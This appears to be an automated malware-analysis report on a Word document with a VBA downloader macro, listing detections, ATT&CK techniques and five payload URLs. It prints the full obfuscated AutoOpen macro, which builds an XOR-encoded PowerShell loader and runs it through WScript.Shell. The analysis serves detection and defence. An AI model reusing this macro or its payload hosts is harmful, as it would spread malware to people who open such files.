Verdict: MALICIOUS
Risk Score: 330

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Microsoft Word document containing VBA macros. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the execution of arbitrary commands. An AutoOpen macro is present, which is commonly used to start malicious activity as soon as the document is opened. This activity is likely to download and execute a second-stage payload, consistent with downloader malware.
Heuristics (10)

- ClamAV: Doc.Downloader.Valyria-7143518-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-7143518-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched lines in script:
  YWbad = UTUnh - FuJjjC + (70254 * Ghbqj)
  zLXpEXGbz = daiWHVKDiPM + CreateObject("Wscript.shell").Run(Anija + Chr(vbKeyP) + mDpaLP + Chr(vbKeyO) + WCwztAJqoYVnI + zXwFoOovO, 204416489 - 204416489)
  cIrukr = OwdjI - hXfuA + (80979 * ooARGD)
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:
  YWbad = UTUnh - FuJjjC + (70254 * Ghbqj)
  zLXpEXGbz = daiWHVKDiPM + CreateObject("Wscript.shell").Run(Anija + Chr(vbKeyP) + mDpaLP + Chr(vbKeyO) + WCwztAJqoYVnI + zXwFoOovO, 204416489 - 204416489)
  cIrukr = OwdjI - hXfuA + (80979 * ooARGD)
- Payload URL decoded from an encoded PowerShell loader (5 URLs) (high, OLE_VBA_ENCODED_PS_DROPPER_URL): A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array, decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
  Attribute VB_Name = "wsnPPRzTBj"
  Sub AutoOpen()
  On Error Resume Next
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://soportek.cl/DNWbs6/ (referenced by macro)
  - http://zonedeux.com/hZRNr9j/ (referenced by macro)
  - http://positivebusinessimages.com/uLRePdnDv/ (referenced by macro)
  - http://www.arabiantravelhouse.com/2QpUykN/ (referenced by macro)
  - https://www.voice.a1radio.ru/H3DPsvrXtK/ (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10571 bytes |

SHA-256: da7a73b8a291b7eb823b47b2bf31cc7d806a1e70d30057ee9bc769d06a694496

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "zsBfRnJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wsnPPRzTBj"
Sub AutoOpen()
On Error Resume Next
GrqsJT = AJXWav * GnvMh / 51089 * anKFY / iwGdYm / hvjaH / 15342 * wMQHjD / 58274 - bwfaJ / jDjmlr * EDtwnY
fhjEF = SYIWPR * DSfEjh / 66577 * JtCzH / tKNdIh / wboMWN / 15221 * AWfWL / 77209 - XSRbHw / niGwm * OusHj
ikVWoV = JnwmY * TLnlY / 64761 * SBiwQ / uGDBf / DViiKz / 5954 * CavwA / 28368 - baNrJ / RchCWG * bBFmS
VBpccn = fEsGl * BzTfpJ / 42745 * mszjo / iaBVId / tRmwl / 7559 * wNkaQX / 10194 - IVQcwa / Isvnwr * CXzIp
uXjVW = FXqqcw * AWwGCs / 61512 * woLTM / PWVVzN / OcrSpX / 61982 * oThNA / 91590 - LiWZHw / jXCKip * VUfiU
VqbuDG = EljfnP * PVVFz / 64749 * kEwksw / IWZuOz / CbzWd / 20896 * ijGuPA / 81407 - zboLE / miJKJw * PKlYSn
KGVEZu = OXCZV * PVHwwd / 69841 * sAnWQ / sJWJsi / IUdaA / 28677 * SjdNQu / 54504 - wvzJna / FiiIF * EAthq
HAdXzP = iMXZF * MJMbJ / 66370 * dqOvsr / XNfjj / AViSXC / 89943 * rGiIcm / 87807 - sZkww / QmhfF * dVjnt
zDnnwLNwlvW (DramiGhoq + ZVsvFC)
ERwiY = PoSAs * wvpFHI / 97332 * kIHHil / kzQoi / NjABF / 34168 * aSTPBb / 50502 - HHXvFj / vJrvm * ipBMJ
nIwIXp = aERVCM * Bwowdh / 37160 * BNsiYV / HEqwIa / uWAzJA / 65813 * vsmiX / 77175 - zjpJq / lPtRY * zNfEEU
uGnNVz = HVdFL * WKqzX / 11366 * QsTQip / OTwCff / wFrIE / 14802 * qOuwwf / 36311 - iVHcnV / mWjfJ * oWaajt
FzqTw = aiZUfJ * YodvC / 83697 * zSUZYw / BrTWS / ukfini / 3552 * WNCDVl / 27319 - tfXpE / niRuzd * mGzMX
End Sub
Function DramiGhoq()
On Error Resume Next
QjOaF = MvqAD / FDvQv - pFMlsA + HiHHXX / 71647 + nsuBj
DjrNN = dDOiM / tuFVob - jhwzjD + zWUdYK / 85412 + KGNMWj
YaLOn = kvPKL / CjHmI - bPGil + CCNkz / 15669 + EGiIWl
aOLjMI = nKlmiX / cKMbu - pFZkv + bppbhz / 60070 + lzmCi
pQzPocf = "wers" + "hell " + " " + " -JO" + "In " + Chr(40) + "'" + "123D42_5" + "9a18s98_" + "49C5" + "8G40_114"
EcYwPa = pIZcR / FcUzMq - hZscrr + mDsWh / 51864 + STVDLj
EKzRp = EUiNH / BjjoSt - PLkNIa + HKUDG / 14015 + NtZHWc
Nznzt = OfmXnf / EETzpq - wtzbG + tonJjv / 31707 + BMwPO
StGLMj = CYJqiT / jIfnNi - jFoSdR + SKAPP / 22440 + LFZjT
PtQQj = "n48_61G" + "53D5" + "8n60r" + "43C127" + "D17s58<4" + "3D113_8" + "_58C61_2" + "8n51a" + "54X5"
ddHnsY = anbYLs / jvuzdZ - pIzWG + oGjjt / 70146 + KFvqj
bEEWim = FYojZ / mVRSPL - YbYYhR + ORolFA / 55927 + GTPlPm
QwYZwO = nLdSHE / jjoNEt - jCiZUp + zCiwB / 75038 + ZzITT
EjNhOQ = hhNkZ / SikvF - KYmQC + qomIzw / 2924 + Edtiu
imAmwEdFG = "8D49_43s" + "100r12" + "3_22" + "C25_40G98" + "r120" + "r55D43r" + "43D47X10" + "1_112" + "_112C44"
QMBjj = CZLvrE / fGGBrm - RlRkFw + Cnioh / 7665 + iRAhO
JcbXDq = Wknau / iVCfbJ - FEdApI + QImNi / 77353 + AqfXak
OpMdY = zPcDSb / VEwah - iBNwZv + HiiXH / 1464 + bqPRX
roKaFk = qfdEI / uBoUHQ - HJTHvi + ZlaAES / 63875 + kfitlz
juitZERWRu = "a48_47X4" + "8n45a43G5" + "8n52<1" + "13r60" + "X51D112r" + "27G17s8G6" + "1s44a105s" + "112n31r" + "55D43D" + "43s47"
sJvQD = NQzVTE / PXXiV - pKHuh + UKELBl / 12700 + rLKXO
fwjSpP = PQAXi / bAswO - cSqTiP + wXzPo / 30564 + pIhQS
rIlJBR = MAHwo / zVTocE - TTiPB + HPRTT / 54374 + XoThhS
shvmmT = UTVpY / oziuRa - dAljHK + ZBoFT / 54165 + pkqiz
nKsRqBR = "s101C" + "112D11" + "2s37D" + "48X4" + "9<58_59" + "_58n42D39"
VZvUTj = acmzY / ojvlqQ - wmPtjh + Ghmow / 80646 + vFrDW
hZDwDu = ahhoa / ImcJpl - LmUwJ + QZBrlj / 89909 + hCfTF
jKjMf = RrdjYC / UnuEGn - inYpw + ffbkz / 81606 + bmBGIQ
awqRv = OQNAQp / ZcDkO - bjQJF + kNtUEN / 194 + JirTp
PPCRvmiVzmv = "X113" + "G60r48G5" + "0s112" + "n55C5a1" + "3X17s45C1" + "02X53_" + "112_31s5" + "5s43" + "G43X4" + "7a101r" + "112D"
oZQMh = GdwYFc / swiwhz - VSSYM + wXiRi / 26932 + zDiYQi
KXWLq = YEAaL / pSkwGM - rkpmC + nhvoQ / 76408 + iuaOu
CTZziz = fNQjHS / WjWVlT - DpcPjn + NvrWC / 42143 + sSnHo
CFCom = KvvqP / sphjJ - llQvs + zBiYsb / 7319 + UDYtja
XqbFhO = "112D" + "47n48" + "<44X54C4" + "3r54a" + "41s58r61_" + "42D44r54<" + "49G58" + "G44s" + "44s5"
ZLPTJz = QiVBFb / pZvwui - jncID + sjDKC / 43692 + jLwza
LQvdG = zjYjP / jwjhh - OznsIp + uANSK / 13304 + zhYilM
NfIvZQ = ihDVOq / ijTHF - LSjON + jGBYA / 93380 + JATiw
jiOWmu = cLOVFH / AWGsAc - jwjpr + cpTFjz / 26779 + nDvlRd
SLukoQhUAO = "4C50r" + "62n56_" + "58G44" + "r113r6" + "0G48C50" + "X112" + "r42_1" + "9X13X58" + "<15<59<49" + "C27r41X"
nBzVr = AtkSS / hzmlTN - ZXWoJ + jhJXF / 84567 + izBom
oiHMww = SIoqnI / UtMZaa - lVSCH + BGwrH / 41195 + VbPrn
XjZPHq = HBkES / baDIp - oplMM + iSzSsd / 41405 + wDVLFK
QIBlA = ZRjkE / jOjpX - KGXDjb + ziDwd / 56038 + VdRrhC
WnVkiZHWZ = "112s31" + "s55C4" + "3C43r47" + "s101G112r" + "112X40n40" + "X40D113C" + "62X45G6" + "2n61r54D" + "62<49a43" + "X45r6" + "2G41<" + "58_51"
rQWWZt = cLfNWr / jvqZF - hTNki + ENXTQv / 26606 + sUITAD
nkEvu = EEuQsI / bvbLiq - haJGE + NTYEqu / 78459 + YGLNz
RbjzDb = WDBhR / zdNaz - GklfpZ + UfCpQw / 63667 + kFuKCd
UXhYMA = ComLS / zmloQ - qPIsr + faPwj / 95882 + zdtwrz
tzZMGEKiX = "n55r48X42" + "s44X5" + "8a113G60" + "D48n50a1" + "12_109" + "D14a47r1" + "0G38C52r1" + "7G112"
jVrIu = ZDBtNO / EYZzt - vwcCuc + NYQjsX / 94229 + pBcJDm
NPjzr = USWfLO / zAvlTd - sXhLu + OwwEhu / 44266 + rbiSQ
wsPrNn = ibHvmQ / QqiUEz - XTSwQ + fFYNTD / 5521 + zHpzH
CrKDcq = EKDkwV / YClnop - FrORIM + LmWZB / 57719 + bDhGuS
BuFPS = "C31a55_" + "43n4" + "3D47" + "X44D10" + "1r112D1" + "12a40r40" + "<40D11" + "3_41C48n" + "54a6" + "0<58G113"
skipjw = 23300 - pjDiG * dTjTnu - bpIAFn
cDfzF = wzaJwA / PETwj - RBmSA + RiPXwn / 79341 + dVYXu
Hqitf = 91734 - JMBcv * DTfHdo - KvpNf
zPYqZ = 93513 - lXlif * tVQqli - oHjci
rtTojzf = "C62n1" + "10<45" + "<62X5" + "9s54a48X" + "113_" + "45X42D11" + "2a23n10" + "8X27s" + "15a44G41" + "D45s7a" + "43_20a" + "112G1"
DramiGhoq = pQzPocf + PtQQj + imAmwEdFG + juitZERWRu + nKsRqBR + PPCRvmiVzmv + XqbFhO + SLukoQhUAO + WnVkiZHWZ + tzZMGEKiX + BuFPS + rtTojzf
suRrX = 47958 - hAonS * qqbCjZ - ctlKa
LLAUN = 83987 - RbXVj * qOncdW - nrPVa
aUwfud = 92409 - WBivXk * kIuMIS - zFXTau
vRuapa = 17050 - rifiQO * MsJzGK - MCfXi
End Function
Function ZVsvFC()
On Error Resume Next
TWAmT = 2737 - iWfFK * iGWhHN - nBMobw
zVqHa = 5746 - jdGQD * LdCIF - pTkIi
fklzPN = 24295 - rCJEfz * mvmcL - spYBX
jAsbw = 18233 - QEZAq * NkQSMk - wjNYa
tJokGm = "20D113" + "r12n47s5" + "1n54n43s1" + "19r1" + "20s31s" + "120X118s1" + "00_123X" + "40G16G59"
FFOLQ = 8526 - anXwRs * mBLwu - sAQQpO
VmvMz = 83662 - tPqQqD * SnHpc - hIWIRn
NQnvJB = 9579 - FiFSQb * MohJsw - qqAcb
kSKMLX = 73714 - raSISz * rfRRKP - NEwzG
oTsDiGTqz = "G127r98" + "n127C12" + "0a106X1" + "03G109D1" + "20r1" + "00r123" + "G53r5" + "9s9r" + "98_12" + "3X58"
fdqPXn = 35196 - OZjTF * XdSuzo - qsKQw
wawvjZ = 78569 - zQtBM * BZRjrz - iofCin
lRszm = 33721 - JSXzt * BioRz - wrCMFA
EpzVC = 35744 - zqcRrD * nlSwhq - bwhwOA
JYzICsLw = "_49X4" + "1X101_43" + "n58G50X" + "47r116<12" + "0X3X120C1" + "16_123n40" + "G16G" + "59D11" + "6D120" + "C113n58<3"
zzmAc = 61748 - Lkbfh * mzDjX - UvALu
DajEn = 94187 - lnTDzL * BnIFzu - ZNjRI
DJiMz = 75151 - kRwDmE * qMMIoJ - dJpDUW
Xpkjw = 48668 - OoiUw * QAjKP - lMYDjE
IKBzjGnhHP = "9X58s" + "120C" + "100_57r48" + "s45<58a" + "62_60n55<" + "119n1" + "23_5<49" + "r45_1" + "27_54r4" + "9X127C1" + "23X22" + "C25G40s"
ZnLcN = 47774 - ilzRO * hDiREa - kBFzqI
urazpJ = 58444 - HkRKC * YFick - GroiFJ
pCDvu = 61564 - TNfkdS * dkJShS - phmwLj
KCbznr = 9146 - ovMuSB * KChtd - lPQXa
hRNomLvkVf = "118n3" + "6C43a" + "45<3" + "8a36C123" + "D42G59D" + "18a113n" + "27C48C4" + "0s49<51_"
zVmQO = 46372 - AqYumQ * PjEmc - cvXlj
AVQwiz = 19215 - aTIQui * wKASct - CUslBi
SvGzw = 52523 - sGWLM * piJRD - GIsMEE
hNlEh = 29044 - UAjOf * cKInjw - CvzXjz
cEtVXiofjs = "48a62D5" + "9s25G5" + "4r51<58a1" + "19X123D" + "5<49" + "n45_115" + "s127C12" + "3r53n59" + "C9C118r1" + "00_12s43G"
TEfijP = 90296 - OifRkF * LYIRoH - OCzOOb
kqFaj = 4250 - tiBFqH * cTwFPf - rrZnZc
zjmJaI = 32916 - DEFMzj * iPXlR - cvZvn
cBzBkv = 76479 - uQpstW * OdOior - zSWAf
jMwiMtjIbk = "62r45D43<" + "114a1" + "5G45a48D" + "60D58a44" + "G44r127" + "D123X53" + "X59s9X1" + "00<6" + "1r45a58a"
TIdKk = 13276 - KONXhr * tpsCjX - zsazUh
lMOmP = 95190 - YaWzE * KDkFBM - QWRiw
IHPuk = 77203 - OjvvBw * UhlTZf - udXfK
jpciUA = 36886 - cSRfV * YnwlU - RaLSuN
nEDmfQ = "62C52G10" + "0s34C60D" + "62C4" + "3r60a5" + "5C36C34" + "r34'.sPL" + "iT" + Chr(40) + " '<rG" + "Ca_XnDs" + "'" + Chr(41) + "| f" + "OreACH-o"
Msfsq = 96265 - fOprAq * Itwjj - SctWaI
NdrOZZ = 19516 - FlLvz * FUNlio - FkVwm
tmIsVS = 75381 - noCZw * wdUzE - RHXWif
WQDLP = 48399 - zkWIH * hnjGq - ZXrYMN
jnmsjCLzY = "BJeCT" + " {[CH" + "ar]" + Chr(40) + "$_ " + "-bxor 0" + "x5F " + Chr(41) + " }" + Chr(41) + " |. " + Chr(40) + " $vERBOs"
ptQpo = 81530 - VIHLEK * ZnXqs - jLUsp
UlPlOq = 20520 - QHwMbT * iodzOK - NYpzl
qwRFV = 81241 - widMK * ilAniQ - bWVsK
kwJRiP = 16350 - zDcJfu * mCUFac - FtcuYL
cjmrSqEjATP = "EPRef" + "eRenC" + "e.tOsT" + "rInG" + Chr(40) + Chr(41) + "[1,3]" + Chr(43) + "'" + "X'-j" + "oiN''" + Chr(41) + ""
ZVsvFC = tJokGm + oTsDiGTqz + JYzICsLw + IKBzjGnhHP + hRNomLvkVf + cEtVXiofjs + jMwiMtjIbk + nEDmfQ + jnmsjCLzY + cjmrSqEjATP
cdsZs = 66634 - tnlBO * jMIXj - trohr
ItzUa = 48664 - JAYipp * Naado - XMsnwi
owBJV = 93376 - AdWzL * NoKClz - aWJsi
ufdYXz = 54290 - DYojmI * DAFhB - CGlqE
End Function
Attribute VB_Name = "kLpDBqHJSps"
Function zDnnwLNwlvW(WCwztAJqoYVnI)
On Error Resume Next
waGFR = obuBzJ - hwwXw + (87606 * LZNpYo)
LOcrs = ciooqK - fiwcR + (6050 * ApjSEW)
HVfJn = miEii - ZUDnu + (59761 * jKDtL)
KdtZN = hcWhF - rKnhD + (83884 * paUXH)
VtqGln = FQXSid - BhvnzA + (93072 * iRkKMQ)
TKQFED = TqdstF - RAvCnz + (47617 * UUCHM)
wDzqwz = mlHRzL - YkITdA + (76857 * OJMjh)
YWbad = UTUnh - FuJjjC + (70254 * Ghbqj)
zLXpEXGbz = daiWHVKDiPM + CreateObject("Wscript.shell").Run(Anija + Chr(vbKeyP) + mDpaLP + Chr(vbKeyO) + WCwztAJqoYVnI + zXwFoOovO, 204416489 - 204416489)
cIrukr = OwdjI - hXfuA + (80979 * ooARGD)
BXpni = QhOPj - TvPFPU + (74275 * vtPhcJ)
VHIIL = PoYXU - wGhTbi + (23127 * wXOUj)
aJnIZo = orGoVV - EswIaF + (83349 * GVYiuk)
End Function